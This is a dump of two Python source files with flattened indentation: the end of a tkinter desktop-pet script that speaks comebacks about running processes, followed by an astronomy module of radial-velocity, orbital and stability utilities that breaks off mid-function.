proclist = (updateprocesses.proclist)
print("Items in process list",len(proclist))
speak = threading.Thread(target=saysomething, args=(char_position,proclist,))
speak.daemon = True
speak.start()
## speech thread end
#if play_animation==1: ## 1 is always pause.
# playpause = 1
#if play_animation!=1:
# playpause = 0
# ## pause animation here
# ...
try:
nextmove_start+=1
root.geometry(char_position)
root.image = tk.PhotoImage(file=DIR+str(count)+'.png')
skahlabel = tk.Label(root, image=root.image, bg='white')
skahlabel.pack(side="bottom")
root.bind("<Button-3>", popupmenu)
root.update()
skahlabel.destroy()
root.update_idletasks()
time.sleep(delay) # Time module delay
except:
count=0
def saysomething(char_position,proclist):
global bubble, speechbubble, lastprocess
print("I'm talking")
try:
bubble.destroy()
#speechbubble.destroy()
except Exception as e:
...
print("booting blocks")
lr_block = int(char_position.split("+")[1]) ## Left - Right
ud_block = int(char_position.split("+")[-1]) ## Up - Down
print("Spawning new tk bubble")
## this block needs to run once, then never again...
try:
print(bubble)
bubble.destroy()
except:
bubble = tk.Tk()
print("tk.tk set")
bubble.config(background = "white")
bubble.overrideredirect(True)# Make window invisible
bubble.wm_attributes("-topmost", True)# Keep skahdi on top even after min
print("bubble spawned")
#bubble.wm_attributes("-transparentcolor", "white")
bubbleposition = "+"+str(lr_block)+"+"+str(ud_block-randint(50,300))
bubble.geometry(bubbleposition)
print("bubble geometry set")
## check for matching processes
for proc in speechdatabase.keys():
try:
if proc.lower() in proclist:
print("I FOUND "+proc)
selectedcomeback = random.choice(speechdatabase[proc]['comebacks'])
T = tk.Text(bubble, height=1, width = len(selectedcomeback), fg = "black", bg = "white")
T.configure(relief = GROOVE, font=("Courier", 15))
T.pack()
T.insert(tk.END, selectedcomeback)
T.configure(state = "disabled")
bubble.update()
bubble.update_idletasks()
print(selectedcomeback)
break
except Exception as errormsg:
print("-->",errormsg)
try:
## text width is equal to number of letters in comeback
engine = pyttsx3.init()
engine.setProperty('rate',configsetting['speech']['wordsperminute']) # wordsperminute
engine.setProperty('volume',configsetting['speech']['speechvolume']) # speechvolume
engine.say(selectedcomeback)
engine.runAndWait()
print("Reached the mainloop")
except:
print("--> I don't think I found any processes")
pass
def save_config():
j = json.dumps(configsetting, indent=4)
f = open('config.ini', 'w')
print(j, end="", file=f)
f.close()
print("Database Updated")
def openkofi():
webbrowser.open('https://ko-fi.com/snepdev', new=2)
def exitskahdi():
root.destroy()
sys.exit()
def hibernate():
global pausevar
print("hibenate called")
try:
if pausevar==True: pausevar=False
elif pausevar==False: pausevar=True
except Exception as e:
print("Loading pause script")
pausevar = False
print("Pause Skahd?",str(pausevar))
if pausevar == True:
count = 0
while pausevar == True:
break
popup = Menu(root, tearoff=1, title="SB (0.1)", relief=RAISED)
#popup.add_command(label="Tell me a joke")
popup.add_separator()
popup.add_command(label="❤-Donate-❤", command=openkofi)
popup.add_command(label="Pause/Play", command=hibernate)
popup.add_command(label="Exit", command=exitskahdi)
hibernate() ## load pausevar
print("Done!")
idleloop(char_position, direction, proclist)
|
functions.py
|
#!/usr/bin/python
__author__ = 'Trifon Trifonov'
import sys, os
#sys.path.insert(0, '../lib')
import numpy as np
import jac2astrocen
import corner
import re
from subprocess import PIPE, Popen
import signal
import platform
import tempfile, shutil
from threading import Thread
from .Warning_log import Warning_log
import scipy.stats as pdf
import dill
from scipy.signal import argrelextrema
from scipy.ndimage import gaussian_filter
import random
import string
import ntpath
import gls as gls
TAU= 2.0*np.pi
def transit_tperi(per, ecc, om, ma, epoch):
"""It derives Time of periatron [tp]
and time of mid transit [t0]
Parameters
----------
per : float
Period of the planet [days].
ecc : float
Eccentricity of the orbit.
om : float
Argument of periastron [deg]
ma : float
Mean anomaly [deg].
epoch : float
Epoch for which the orbital elements are valid [BJD].
Returns
-------
[tp,t0]
If the epoch is in BJD, then tp and t0 are also in BJD.
"""
om = np.radians(om)
ma = np.radians(ma)
E = 2.0*np.arctan( np.sqrt( ( (1.0-ecc)/(1.0+ecc) ) ) * np.tan( (np.pi/4.0)-(om/2.0) ) )
t_peri = epoch - ((ma/TAU)*per)
t_transit = t_peri + (E + ecc*np.sin(E)) * (per/TAU)
return t_peri, t_transit
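# Illustrative usage sketch (added here; the orbital values below are assumed, not
# part of the original module): derive the time of periastron and of mid-transit.
def _example_transit_tperi():
    per, ecc, om, ma, epoch = 365.25, 0.05, 90.0, 45.0, 2458000.0  # hypothetical orbit
    t_peri, t0 = transit_tperi(per, ecc, om, ma, epoch)
    # t_peri sits (ma/360)*per ~ 45.7 days before the epoch; t0 then follows from the
    # eccentric anomaly at inferior conjunction computed above.
    return t_peri, t0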
def ma_from_t0(per, ecc, om, t_transit, epoch):
'''
'''
om = np.radians(om)
E = 2.0*np.arctan( np.sqrt( ( (1.0-ecc)/(1.0+ecc) ) ) * np.tan( (np.pi/4.0)-(om/2.0) ) )
# t_transit = epoch - ((ma/TAU)*per) + (E + ecc*np.sin(E)) * (per/TAU)
ma = ((epoch - t_transit + (E + ecc*np.sin(E)) * (per/TAU))*TAU)/per
ma = np.degrees(ma)%360.0
return ma
def ma_for_epoch(per, t_peri, epoch):
'''
'''
ma = np.degrees(2.0*np.pi*( (epoch - t_peri)/per % 1.))  # use the t_peri argument, not an undefined "fit" object
return ma
def mass_to_K(P,ecc,incl, pl_mass,Stellar_mass):
'''Returns the RV semi-amplitude K in m/s
Parameters
----------
P : float
Period of the planet in [d]
ecc : float
eccentricity
incl: float
inclination in [deg]
pl_mass: float
planet mass in [Msol]
Stellar_mass: float
Primary mass in [Msol]
Returns
-------
float
    K in [m/s]
'''
THIRD = 1.0/3.0
GMSUN = 1.32712497e20
AU=1.49597892e11
T = P*86400.0
#K = ((2.0*np.pi*GMSUN)/T)**THIRD * (pl_mass*np.sin(np.radians(incl)) /
# (Stellar_mass+pl_mass)**(2.0/3.0)) * 1.0/np.sqrt(1.0-ecc**2.0)
K = ((2.0*np.pi*GMSUN)/T)**THIRD * (pl_mass*np.sin(np.radians(incl)) /
(Stellar_mass+pl_mass)**(2.0/3.0))
return K
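# Hedged sanity check (values assumed): a Jupiter-mass planet (~9.546e-4 Msol) on a
# circular, edge-on ~4332.8-day orbit around a 1 Msol star should yield K of roughly
# 12.5 m/s with the expression above.
def _example_mass_to_K():
    K = mass_to_K(P=4332.8, ecc=0.0, incl=90.0, pl_mass=9.546e-4, Stellar_mass=1.0)
    return K  # expected ~12.5 m/s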
def convert_Session_to_Py3(old_ses):
"""
Convert a Python 2 session to Python 3
"""
# Make a name for the new pickle
new_ses = os.path.splitext(os.path.basename(old_ses))[0]+"_p3.ses"
# Convert Python 2 "ObjectType" to Python 3 object
dill._dill._reverse_typemap["ObjectType"] = object
# Open the pickle using latin1 encoding
with open(old_ses, "rb") as f:
loaded = dill.load(f, encoding="latin1")
# Re-save as Python 3 pickle
with open(new_ses, "wb") as outfile:
dill.dump(loaded, outfile)
return new_ses
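# Hedged usage sketch (the session file name is hypothetical): re-save an old
# Python 2 pickle; the converted file is written in the current working directory
# with a "_p3.ses" suffix and its path is returned.
def _example_convert_session(old_ses="old_session.ses"):
    return convert_Session_to_Py3(old_ses)  # -> "old_session_p3.ses"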
def find_close_elements(a, b, precision = 0.01):
"""Finds close elements in two arrays with diffrent sizes.
Parameters
----------
a : array of floats with dimension N
Description of parameter `a`.
b : array of floats with dimension M
Description of parameter `b`.
precision : threshold within which two elements are considered the same.
Description of parameter `precision`.
Returns
-------
[array, array]
returns two arrays with the elements that matched within the
precision.
"""
return [[x for x in a for i in b if abs(x - i) < precision], [x for x in b for i in a if abs(x - i) < precision]]
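# Hedged example (arrays assumed): keep only the entries of a and b that agree to
# within the given precision.
def _example_find_close_elements():
    a = np.array([1.000, 2.500, 3.141])
    b = np.array([0.995, 3.139, 7.000])
    matched_a, matched_b = find_close_elements(a, b, precision=0.01)
    # matched_a -> [1.000, 3.141], matched_b -> [0.995, 3.139]
    return matched_a, matched_b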
def custom_param_file_for_stability(max_time,time_step):
##### create the param.in file (change only the "t_max" and the "dt" for now) ######
param_file = open('param.in', 'w')  # text mode, since a str template is written below
max_time = float(max_time)*365.25 # convert to days
param_file.write("""0.0d0 %s %s
%s %s
F T T T T F
0.001 50.0 50.0 -1. T
bin.dat
unknown
"""%(max_time, time_step, max_time/1e4, max_time/1e3 ))
param_file.close()
return
def get_mode_of_samples(samples, nsamp):
mode_samp = []
# err1_samp = []
# err2_samp = []
for i in range(nsamp):
#ci = np.percentile(samples[:,i], [level, 100.0-level])
#mmm = stats.binned_statistic(np.array([samples[:,i]]), axis=None)
n, b = np.histogram(samples[:,i], bins=100)
n = gaussian_filter(n, 1.0)
x0 = np.array(list(zip(b[:-1], b[1:]))).flatten()
y0 = np.array(list(zip(n, n))).flatten()
k = np.unravel_index(y0.argmax(),y0.shape)
mode_samp.append(x0[k])
#err1_samp.append(x0[k]- ci[0])
#err2_samp.append(ci[1]- x0[k])
# print el_str[i],'=', x0[k], "- %s"%(x0[k]-ci[0]), "+ %s"%(ci[1] - x0[k] )
return mode_samp #,err1_samp,err2_samp
def get_mean_of_samples(samples, nsamp):
mean_samp = []
for i in range(nsamp):
mean_samp.append(np.mean(samples[:,i]))
return mean_samp
def get_median_of_samples(samples, nsamp):
median_samp = []
for i in range(nsamp):
median_samp.append(np.median(samples[:,i]))
return median_samp
def get_MAD_of_samples(samples, nsamp):
mad_samp = []
for i in range(nsamp):
mad_samp.append(np.mean(np.absolute(samples[:,i] - np.mean(samples[:,i]))))
return mad_samp
def get_best_lnl_of_samples(samples,lnl, nsamp):
best_ln_samp = []
lnL_best_idx = np.argmax(lnl)
lnL_best = lnl[lnL_best_idx]
for i in range(nsamp):
minlnL = samples[lnL_best_idx,i]
best_ln_samp.append(minlnL)
return best_ln_samp,lnL_best #,err1_samp,err2_samp
def cornerplot(obj, fileinput=False, level=(100.0-68.3)/2.0,type_plot = 'mcmc', **kwargs):
#obj = dill.copy(copied_obj)
'''Generates a corner plot visualizing the mcmc samples. Optionally samples can be read from a file.'''
#self.mcmc_sample_file = 'mcmc_samples'+'_%s'%mod
#self.corner_plot_file = 'cornerplot.png'
if(fileinput):
if type_plot == 'mcmc':
samples=read_file_as_array_of_arrays_mcmc(obj.mcmc_sample_file)
if type_plot == 'nest':
samples=read_file_as_array_of_arrays_mcmc(obj.nest_sample_file)
# elif(obj.sampler_saved):
# samples=obj.sampler.samples
else:
raise Exception ('Please run mcmc/nested sampling and save sampler or provide a valid samples file!')
#print(len(obj.e_for_mcmc),len(samples),obj.e_for_mcmc)
fig = corner.corner(samples,bins=25, color="k", reverse=True, upper= True, labels=obj.e_for_mcmc, quantiles=[level/100.0, 1.0-level/100.0],
levels=(0.6827, 0.9545,0.9973), smooth=1.0, smooth1d=1.0, plot_contours= True, show_titles=True, truths=obj.par_for_mcmc,
dpi = 300, pad=15, labelpad = 50 ,truth_color ='r', title_kwargs={"fontsize": 12}, scale_hist=True, no_fill_contours=True,
plot_datapoints=True, kwargs=kwargs)
if type_plot == 'mcmc':
fig.savefig(obj.mcmc_corner_plot_file)
if type_plot == 'nest':
fig.savefig(obj.nest_corner_plot_file)
### memory leak in loops!
fig.clf()
del fig
samples = 0
return
def planet_orbit_xyz(obj, planet):
u1 = obj.params.stellar_mass * (4*np.pi*np.pi)/(365.25*365.25)
mean_orb = np.linspace(0,2.0*np.pi, 360)
x = np.zeros(len(mean_orb))
y = np.zeros(len(mean_orb))
z = np.zeros(len(mean_orb))
u = np.zeros(len(mean_orb))
v = np.zeros(len(mean_orb))
w = np.zeros(len(mean_orb))
dist = np.zeros(len(mean_orb))
q = (1.0 - obj.params.planet_params[2 + int(planet)*7])*float(obj.fit_results.a[int(planet)])
#this need to be fixed to work with arrays
for f in range(len(mean_orb)):
x[f],y[f],z[f],u[f],v[f],w[f] = jac2astrocen.mco_el2x(u1,q,
obj.params.planet_params[2 + int(planet)*7],
np.radians(obj.params.planet_params[5 + int(planet)*7]-90.0),
np.radians(obj.params.planet_params[3 + int(planet)*7]) - np.radians(obj.params.planet_params[6 + int(planet)*7]),
np.radians(obj.params.planet_params[6 + int(planet)*7] ), mean_orb[f])
dist[f] = np.sqrt(x[f]**2.0 + y[f]**2.0 + z[f]**2.0)
x_p,y_p,z_p,u_p,v_p,w_p = jac2astrocen.mco_el2x(u1,q,
obj.params.planet_params[2 + int(planet)*7],
np.radians(obj.params.planet_params[5 + int(planet)*7] -90.0),
np.radians(obj.params.planet_params[3 + int(planet)*7]) - np.radians(obj.params.planet_params[6 + int(planet)*7]),
np.radians(obj.params.planet_params[6 + int(planet)*7]), np.radians(obj.params.planet_params[4 + int(planet)*7]))
min_index = np.unravel_index(np.argmin(dist, axis=None), dist.shape)
max_index = np.unravel_index(np.argmax(dist, axis=None), dist.shape)
return np.array([x,y,z,u,v,w]), np.array([x_p,y_p,z_p,u_p,v_p,w_p]), np.array([x[min_index],y[min_index],z[min_index],u[min_index],v[min_index],w[min_index]]), np.array([x[max_index],y[max_index],z[max_index],u[max_index],v[max_index],w[max_index]])
def get_xyz(obj):
st_mass = obj.params.stellar_mass * (4*np.pi*np.pi)/(365.25*365.25)
frho3 = 1.0
u1 = st_mass
obj.xyz_mass[0] = u1
Msun = 1.989e33
Au = 1.49597892e13
##### this is a hack to avoid a transit init crash! To be fixed/removed
if obj.fit_results.mass == 0 or len(np.atleast_1d(obj.fit_results.mass)) == 0 or np.sum(obj.fit_results.a) == 0:
return obj
#####################################################################
for i in range(obj.npl):
pl_mass_in_st = float(obj.fit_results.mass[i])/ 1047.70266835
pl_mass = pl_mass_in_st * (4*np.pi*np.pi)/(365.25*365.25)
q = (1.0 - obj.params.planet_params[2 + i*7])*float(obj.fit_results.a[i])
obj.rpl[i+1] = frho3*(1.5*pl_mass_in_st*Msun/(2*np.pi))**0.3333333333/Au
# rpl(i) = frho3*(1.5d0*mpl0*MSUN/TWOPI)**0.3333333333d0/AU
obj.rhill[i+1] = float(obj.fit_results.a[i])*(pl_mass/(3.0*st_mass))**0.3333333333
u1 = u1 +pl_mass
obj.xyz_mass[i+1] = pl_mass
x_p,y_p,z_p,u_p,v_p,w_p = jac2astrocen.mco_el2x(u1,q,
obj.params.planet_params[2 + i*7],
np.radians(obj.params.planet_params[5 + i*7]),
np.radians(obj.params.planet_params[3 + i*7]) - np.radians(obj.params.planet_params[6 + i*7]),
np.radians(obj.params.planet_params[6 + i*7]), np.radians(obj.params.planet_params[4 + i*7]))
obj.xzy[i+1] = np.array([x_p,y_p,z_p])
obj.uvw[i+1] = np.array([u_p,v_p,w_p])
return obj
def get_Hill_satb(obj):
st_mass = float(obj.params.stellar_mass)* 1047.70266835
if obj.fit_results.mass == 0 or len(np.atleast_1d(obj.fit_results.mass)) <=1:
return False
#####################################################################
else:
Delta_a = (float(obj.fit_results.a[1]) - float(obj.fit_results.a[0]))/float(obj.fit_results.a[0])
Mu = 2.4*( (float(obj.fit_results.mass[0])/ st_mass) + (float(obj.fit_results.mass[1])/ st_mass) )**(1.0/3.0)
if Mu >= Delta_a:
return False
else:
return True
def get_AMD_stab(obj):
st_mass = float(obj.params.stellar_mass)* 1047.70266835
AMD_stable = True
if obj.fit_results.mass == 0 or len(np.atleast_1d(obj.fit_results.mass)) <=1:
return False
else:
pl_ecc = np.array([float(obj.params.planet_params[2 + i*7]) for i in range(obj.npl)])
pl_a = np.array([float(obj.fit_results.a[i]) for i in range(obj.npl)])
pl_mass = np.array([float(obj.fit_results.mass[i]) for i in range(obj.npl)])
inds = pl_a.argsort()
sorted_pl_ecc = pl_ecc[inds]
sorted_pl_a = pl_a[inds]
sorted_pl_mass = pl_mass[inds]
for i in range(obj.npl - 1):
alpha = sorted_pl_a[i]/sorted_pl_a[i+1]
gamma = sorted_pl_mass[i]/sorted_pl_mass[i+1]
epsilon = (sorted_pl_mass[i]+sorted_pl_mass[i+1])/st_mass
AMD = gamma*np.sqrt(alpha)*(1.-np.sqrt(1.-sorted_pl_ecc[i]**2)) + 1.-np.sqrt(1.-sorted_pl_ecc[i+1]**2)
AMD_Hill = gamma*np.sqrt(alpha) + 1. - (1.+gamma)**1.5 * np.sqrt(alpha/(gamma+alpha) * (1.+(3.**(4./3.)*epsilon**(2./3.)*gamma)/((1.+gamma)**2)))
#print( AMD,AMD_Hill)
if AMD >= AMD_Hill:
return False
return AMD_stable
def loglik_AMD_penalty(pl_a,pl_ecc,pl_mass,st_mass):
for i in range(len(pl_a) - 1):
alpha = pl_a[i]/pl_a[i+1]
gamma = pl_mass[i]/pl_mass[i+1]
epsilon = (pl_mass[i]+pl_mass[i+1])/st_mass
AMD = gamma*np.sqrt(alpha)*(1.-np.sqrt(1.- pl_ecc[i]**2)) + 1.-np.sqrt(1.- pl_ecc[i+1]**2)
AMD_Hill = gamma*np.sqrt(alpha) + 1. - (1.+gamma)**1.5 * np.sqrt(alpha/(gamma+alpha) * (1.+(3.**(4./3.)*epsilon**(2./3.)*gamma)/((1.+gamma)**2)))
if AMD >= AMD_Hill:
return -np.inf
return 0
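# Hedged example (planet and stellar values are assumed): for a well-separated,
# low-eccentricity pair the AMD-Hill criterion is satisfied and the penalty is 0;
# tightly packed or eccentric configurations return -inf instead.
def _example_loglik_AMD_penalty():
    st_mass = 1.0 * 1047.70266835            # 1 Msol expressed in Jupiter masses
    pl_a    = np.array([1.0, 5.2])            # semi-major axes [au]
    pl_ecc  = np.array([0.02, 0.05])
    pl_mass = np.array([1.0, 1.0])            # planet masses [Mjup]
    return loglik_AMD_penalty(pl_a, pl_ecc, pl_mass, st_mass)  # expected 0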
def randomString(stringLength=5):
"""
Generate a random string of fixed length
"""
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(stringLength))
def copy_file_to_datafiles(path):
'''
Creates a temporary copy of a velocity file (under /tmp/es2 on macOS, otherwise in
a tempfile.mkdtemp() directory), keeping only the first three columns.
input: full path to the file
output: path of the temporary copy to be loaded
'''
dirname, basename = os.path.split(path)
#temp_dir = './datafiles'#tempfile.gettempdir()
tmp = '/tmp/es2'
if platform.system() == 'Darwin':
if not os.path.exists(tmp):
os.system("mkdir %s"%tmp)
tmp = '/tmp/es2/%s'%randomString(5)
os.system("mkdir %s"%tmp)
else:
tmp = tempfile.mkdtemp()
temp_path = os.path.join(tmp, basename)
# os.system("cp %s %s"%(path, temp_path))
f_in = open(path, "r")
lines = f_in.readlines()
f = open(temp_path, 'wb') # open the file
for j in range(len(lines)):
line = lines[j].split()
if line[0].startswith("#"):
continue
text = b"%s %s %s \n"%(bytes(str(line[0]).encode()),bytes(str(line[1]).encode()),bytes(str(line[2]).encode()) )
f.write(text)
f.close()
f_in.close()
return temp_path
def mut_incl(i1,i2,capOm):
'''
Calculates the mutual inclination of two planets
input parameters:
i1, i2, Delta Omega: inclinations and difference of the lines of nodes, in deg.
output parameters:
Delta i: mutual orbital inclination in deg.
'''
fb = np.degrees(np.arccos(((np.cos(np.radians(i1))*np.cos(np.radians(i2)))+
(np.sin(np.radians(i1))*np.sin(np.radians(i2))*np.cos(np.radians(capOm))))))
return fb
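# Hedged check (angles assumed): i1 = 90 deg, i2 = 60 deg and Delta Omega = 0 deg
# should give a mutual inclination of 30 deg; coplanar orbits give 0 deg.
def _example_mut_incl():
    return mut_incl(90.0, 60.0, 0.0)  # expected ~30.0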
def add_jitter(obj, errors, ind):
errors_with_jitt = np.array([np.sqrt(errors[i]**2 + obj.params.jitters[ii]**2) for i,ii in enumerate(ind)])
return errors_with_jitt
def get_stellar_rotation(obj, print_output=False):
'''
'''
vsini = float(obj.stellar_vsini)
vsini_d = float(obj.stellar_vsini_err)
R = float(obj.stellar_radius)
R_d = float(obj.stellar_radius_err)
Rot = (2*np.pi*R*695700.0)/ (vsini * 86400.0)
Delta_Rot = np.sqrt( ( ( (2*np.pi*R*695700.0)**2 * (vsini_d*86400.0)**2) + ((2*np.pi*R_d*695700.0)**2 * (vsini*86400.0)**2) ) /
(vsini*86400.0)**4
)
if print_output == True:
print("Stellar Rot. period = %s +/- %s [days]"%(Rot, Delta_Rot))
return [Rot, Delta_Rot]
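# Hedged numeric sketch of the same relation (stellar values assumed, not read from
# an object): Prot = 2*pi*R / vsini, with R in solar radii (695700 km) and vsini in
# km/s, divided by 86400 s/day to get days.
def _example_rotation_period(R_sun=1.0, vsini_kms=2.0):
    return (2.0*np.pi*R_sun*695700.0) / (vsini_kms*86400.0)  # ~25.3 d for the defaults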
def get_rv_scatter(obj, print_output=False,use_kb2011=False):
'''
'''
Solar_fact = 0.234
Solar_fact_d = 0.014
M = float(obj.stellar_mass)
M_d = float(obj.stellar_mass_err)
L = float(obj.stellar_luminosity)
L_d = float(obj.stellar_luminosity_err)
Teff = float(obj.stellar_Teff)/5771.0
Teff_d = float(obj.stellar_Teff_err)/5771.0
if use_kb2011==True:
A = (L / ((M**1.5)*(Teff**4.25))) * Solar_fact
delta_A = 0.25*np.sqrt(
(L**2.0 * (
4.0*Teff**2.0 *(
(4.0 * (M**2.0) * (Solar_fact_d**2.0)) +
(9.0 * M_d**2.0 * Solar_fact**2.0)) +
(289.0 * (Teff_d**2.0) * (M**2.0) * (Solar_fact**2.0) )) +
(16.0 * (L_d**2.0) * (Teff**2.0) * (M**2.0) * (Solar_fact**2.0)) ) / ((Teff**(21.0/2.0)) * (M**5.0)) )
if print_output == True:
print("KB2011 jitter = %s +/- %s [m/s]"%(A, delta_A))
else:
A = (L/M) * Solar_fact
delta_A = np.sqrt( (L**2.0 * ((M**2.0)*(Solar_fact_d**2.0) + (M_d**2.0)*(Solar_fact**2.0) ) +
((L_d**2.0) *(M**2.0) * (Solar_fact**2.0) ) )/ M**4.0 )
if print_output == True:
print("KB1995 jitter = %s +/- %s [m/s]"%(A, delta_A))
return [A, delta_A]
def export_RV_data(obj, idset_ts, file="RV_data.txt", jitter=False, o_c=False, print_data=False, width = 10, precision = 3):
if len(obj.filelist.idset)==0:
return
# if idset_ts ==0:
# print("dataset IDs start from 1")
# return
# elif len(np.atleast_1d(idset_ts)) > 1:
# if 0 in idset_ts:
# print("dataset IDs start from 1")
# return
#if not os.path.exists(path):
# os.makedirs(path)
output_file = str(file)
f = open(output_file, 'w')
idset_ts = np.array(np.atleast_1d(idset_ts)) #-1
JD = obj.fit_results.rv_model.jd
if not o_c:
rv = obj.fit_results.rv_model.rvs
else:
rv = obj.fit_results.rv_model.o_c
id_set = obj.filelist.idset
if jitter==True:
sigma = add_jitter(obj,obj.fit_results.rv_model.rv_err, id_set)
else:
sigma = obj.fit_results.rv_model.rv_err
if len(idset_ts)==1:
for i in range(len(JD[id_set==idset_ts[0]])):
if print_data == True:
print(float(JD[i]), float(rv[i]), float(sigma[i]))
f.write('{0:{width}.{precision}f} {1:{width}.{precision}f} {2:{width}.{precision}f} \n'.format(float(JD[i]), float(rv[i]), float(sigma[i]), width = width, precision = precision ) )
else:
for i in range(len(idset_ts)):
for ii in range(len(JD)):
if int(id_set[ii]) != int(idset_ts[i]):
continue
else:
f.write('{0:{width}.{precision}f} {1:{width}.{precision}f} {2:{width}.{precision}f} {3:{width}.{precision}f} \n'.format(float(JD[ii]), float(rv[ii]), float(sigma[ii]), idset_ts[i], width = width, precision = precision ) )
f.close()
print('Done!')
return
def export_RV_model(obj, file="RV_model.txt", width = 10, precision = 4):
if len(obj.fit_results.rv_model.jd)==0:
return
#if not os.path.exists(path):
# os.makedirs(path)
output_file = str(file)
f = open(output_file, 'w')
JD = obj.fit_results.model_jd
if obj.doGP == True:
y_model = obj.fit_results.model + obj.gp_model_curve[0]
else:
y_model = obj.fit_results.model
for i in range(len(JD)):
# f.write('%.4f %.4f \n'%(float(JD[i]), float(y_model[i]) ))
f.write('{0:{width}.{precision}f} {1:{width}.{precision}f} \n'.format(float(JD[i]), float(y_model[i]), width = width, precision = precision) )
f.close()
print('Done!')
return
def export_orbital_evol(obj, file="orb_evol.txt", planet = 1, width = 10, precision = 6):
k = int(planet-1)
if len(obj.evol_T[k])==0 or k < 0:
print("No N-body integrations done?")
return
output_file = str(file)
f = open(output_file, 'w')
#obj.evol_T_energy
#obj.evol_energy
#obj.evol_momentum['lx']
#obj.evol_momentum['ly']
#obj.evol_momentum['lz']
T = obj.evol_T[k]
a = obj.evol_a[k]
e = obj.evol_e[k]
om = obj.evol_p[k]
M = obj.evol_M[k]
inc = obj.evol_i[k]
Om =obj.evol_Om[k]
for i in range(len(T)):
# f.write('%.4f %.4f \n'%(float(JD[i]), float(y_model[i]) ))
f.write('{0:{width}.{precision}f} {1:{width}.{precision}f} {2:{width}.{precision}f} {3:{width}.{precision}f} {4:{width}.{precision}f} {5:{width}.{precision}f} {6:{width}.{precision}f} \n'.format(float(T[i]), float(a[i]), float(e[i]), float(om[i]),float(M[i]),float(inc[i]),float(Om[i]), width = width, precision = precision) )
f.close()
print('Done!')
return
def check_temp_RV_file(obj):
for i in range(obj.filelist.ndset):
if os.path.exists(obj.filelist.files[i].path):
continue
else:
dirname, basename = os.path.split(obj.filelist.files[i].path)
os.makedirs(dirname)
f = open(obj.filelist.files[i].path, 'wb') # open the file
for j in range(len(obj.rv_data_sets[i][0])):
if str(obj.rv_data_sets[i][0][j]).startswith("#"):
continue
text = b"%s %s %s \n"%(bytes(str(obj.rv_data_sets[i][0][j]).encode()),bytes(str(obj.rv_data_sets[i][1][j]).encode()),bytes(str(obj.rv_data_sets[i][2][j]).encode()) )
f.write(text)
f.close()
def modify_temp_RV_file_old(obj, file_n = 0, add_error = 0, data_to_keep = None):
if obj.filelist.ndset < file_n +1:
print("No RV file # %s"%(file_n+1))
return
elif not os.path.exists(obj.filelist.files[file_n].path):
return
else:
if add_error < 0:
sign = -1
else:
sign = 1
new_error = []
for j in range(len(obj.rv_data_sets[file_n][0])):
k = obj.rv_data_sets[file_n][2][j]**2 + add_error**2 *sign
if k < 0:
print("You seem to subtract %s from the error budget. As a result, the RV uncertainty of one or more elements would be negative. Errors cannot be negative. Please subtract another value"%add_error)
return
new_error.append(k)
f = open(obj.filelist.files[file_n].path, 'wb') # open the file
for j in range(len(obj.rv_data_sets[file_n][0])):
#obj.rv_data_sets[file_n+1][2][j] = np.sqrt(new_error[j])
if str(obj.rv_data_sets[file_n][0][j]).startswith("#") or data_to_keep != None and j not in data_to_keep:
continue
text = b"%s %s %s \n"%(bytes(str(obj.rv_data_sets[file_n][0][j]).encode()),bytes(str(obj.rv_data_sets[file_n][1][j]).encode()),bytes(str(np.sqrt(new_error[j])).encode()) )
f.write(text)
f.close()
obj.filelist.read_rvfiles(obj.params.offsets)
return obj
def bin_rv_data(obj, file_n = 0, bin_size = 1.0, bin_tf = False):
if bin_tf == False:
obj.rv_data_sets[file_n] = dill.copy(obj.rv_data_sets_init[file_n])
return
else:
JD = np.array(obj.rv_data_sets[file_n][0])
rv = np.array(obj.rv_data_sets[file_n][1])
sigma = np.array(obj.rv_data_sets[file_n][2])
idset = np.array(obj.rv_data_sets[file_n][2])
mask = np.zeros(len(JD))
mj_all = []
mr_all = []
ms_all = []
mi_all = []
for x in range(len(JD)):
JD_int = JD.astype(int)
mask = (JD_int != JD_int[x]).astype(int)
mj = np.ma.masked_array(JD, mask=mask).compressed()
mr = np.ma.masked_array(rv, mask=mask).compressed()
ms = np.ma.masked_array(sigma, mask=mask).compressed()
mi = np.ma.masked_array(idset, mask=mask).compressed()
mj_all.append(np.mean(mj))
mr_all.append(np.average(mr, weights=1./ms))
#ms_all.append(np.average(ms/np.sqrt(len(ms)), weights=1./ms) )
ms_all.append(np.average(ms) )
mi_all.append(np.mean(mi))
#ms_all.append( np.sqrt( (np.average(ms/np.sqrt(len(ms)), weights=1./ms)**2.0) + (abs(max(mr)-min(mr))**2.0) ) )
#ms_all.append( np.sqrt( (np.average(ms/np.sqrt(len(ms)), weights=1./ms)**2.0) + np.std(mr)**2.0) ) )
#print np.median(mr), np.std(mr)
JD, indices = np.unique(np.asarray(mj_all), return_index=True)
ind = np.array(indices)
mr_all = np.array(mr_all)
mj_all = np.array(mj_all)
ms_all = np.array(ms_all)
mi_all = np.array(mi_all)
mr_all = mr_all[ind]
mj_all = mj_all[ind]
ms_all = ms_all[ind]
mi_all = mi_all[ind]
obj.rv_data_sets[file_n] = np.array([mj_all,mr_all,ms_all,mi_all])
#obj.rv_data_sets[file_n][0] = dill.copy(mj_all)
#obj.rv_data_sets[file_n][1] = dill.copy(mr_all)
#obj.rv_data_sets[file_n][2] = dill.copy(ms_all)
#obj.rv_data_sets[file_n][3] = dill.copy(mi_all)
return obj
def modify_temp_RV_file(obj, file_n = 0, add_error = 0, data_to_keep = None):
if obj.filelist.ndset < file_n +1:
print("No RV file # %s"%(file_n+1))
return
elif not os.path.exists(obj.filelist.files[file_n].path):
return
else:
if add_error < 0:
sign = -1
else:
sign = 1
new_error = []
for j in range(len(obj.rv_data_sets[file_n][0])):
k = obj.rv_data_sets[file_n][2][j]**2 + add_error**2 *sign
if k < 0:
print("You seem to subtract %s from the error budget. As a result, the RV uncertainty of one or more elements would be negative. Errors cannot be negative. Please subtract another value"%add_error)
return
new_error.append(k)
f = open(obj.filelist.files[file_n].path, 'wb') # open the file
org_data_file = obj.rv_data_sets[file_n]
for j in range(len(org_data_file[0])):
#obj.rv_data_sets[file_n+1][2][j] = np.sqrt(new_error[j])
if str(org_data_file[0][j]).startswith("#") or data_to_keep != None and j not in data_to_keep:
continue
text = b"%s %s %s \n"%(bytes(str(org_data_file[0][j]).encode()),bytes(str(org_data_file[1][j]).encode()),bytes(str(np.sqrt(new_error[j])).encode()) )
f.write(text)
f.close()
obj.filelist.read_rvfiles(obj.params.offsets)
return obj
### some experimets! ###
def sigma_clip(obj, type = 'RV', sigma_clip = 10, file_n = 0, add_error = 0, remove_mean = False, verbose = True):
if type == 'RV':
if sigma_clip == None:
modify_temp_RV_file(obj, file_n = file_n, add_error = add_error, data_to_keep = None)
return
else:
